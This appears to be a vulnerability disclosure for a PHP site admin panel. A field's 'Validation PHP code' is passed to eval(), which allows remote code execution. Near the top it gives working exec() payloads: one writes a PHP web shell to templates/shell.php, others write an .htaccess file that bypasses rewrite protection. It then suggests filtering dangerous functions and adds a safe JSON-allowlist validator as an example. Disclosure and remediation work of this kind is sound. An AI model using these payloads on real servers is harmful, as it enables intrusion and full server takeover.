Affected version
login address
http://loacalhost/panel
Find `Fields` after login.
On the right are the operations related to the column; choose one here, select `Facebook`.
Open `Required field`.
`Validation PHP code` accepts any PHP code; here is a one-sentence Trojan:
exec('echo ^<?php eval($_GET["aa"]); ?^> >./templates/shell.php');
Then visit
http://loacalhost/profile/?edit
The written code will be triggered when the corresponding column is modified.
But due to the `.htaccess` file under the root path, we cannot directly access the shell.
We can write a `.htaccess` file in the same directory as the shell to bypass this.
In the same way, execute
exec('echo ^<IfModule mod_rewrite.c^> >./templates/.htaccess');exec('echo RewriteEngine Off ^</IfModule^> >>./templates/.htaccess');
Then go to `/profile/?edit` to trigger it.
At this time, you can access the shell and execute any command.
Principle
The reason is that the code entered in the background `Fields` will be written to the database.
Then, when the information is modified, the data in it will be executed through `eval()`.
Proposed changes
Add filtering of sensitive functions, such as `exec()`, `system()`, etc., to the incoming `Validation PHP code`.
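The report traces the issue to stored `Validation PHP code` reaching `eval()`. As an added example (not code from the project or from the reporter), this is one way to validate a field without evaluating stored code: rules are kept as JSON and dispatched through a fixed allowlist. The rule names, the JSON layout and all function names are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical replacement for a per-field "Validation PHP code" setting:
// the column holds a JSON rule list (data), never PHP source, so nothing
// saved in the panel is ever passed to eval().
const VALIDATORS = [            // fixed allowlist; rule names are assumptions
    'required'   => 'rule_required',
    'max_length' => 'rule_max_length',
    'url_host'   => 'rule_url_host',
];

function rule_required(string $v, array $a): bool { return trim($v) !== ''; }
function rule_max_length(string $v, array $a): bool {
    return strlen($v) <= (int)($a['max'] ?? 255);   // length in bytes
}

function rule_url_host(string $v, array $a): bool {
    if ($v === '') { return true; }                 // emptiness is handled by "required"
    $host = parse_url($v, PHP_URL_HOST);
    return is_string($host)
        && in_array(strtolower($host), (array)($a['hosts'] ?? []), true);
}

/** Returns a list of error strings; an empty list means the value is accepted. */
function validate_field(string $storedRules, string $value): array
{
    $rules = json_decode($storedRules, true);
    if (!is_array($rules)) {
        return ['invalid rule definition'];         // fail closed on anything that is not JSON
    }
    $errors = [];
    foreach ($rules as $rule) {
        $name = is_array($rule) ? ($rule['rule'] ?? null) : null;
        if (!is_string($name) || !array_key_exists($name, VALIDATORS)) {
            $errors[] = 'unknown rule rejected';
            continue;
        }
        if (!(VALIDATORS[$name])($value, $rule)) {
            $errors[] = "failed: $name";
        }
    }
    return $errors;
}

// Constructed sample data: a rule list for the Facebook field, then a legacy PHP string.
$rules = '[{"rule":"required"},{"rule":"url_host","hosts":["facebook.com","www.facebook.com"]}]';
var_dump(validate_field($rules, 'https://www.facebook.com/example'));
var_dump(validate_field('return strlen($value) > 0;', 'https://www.facebook.com/example'));
```

Because a value that does not parse as a JSON rule list is rejected outright, PHP source left in the column from the old setting is never interpreted.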
Remote code execution vulnerabilities in the background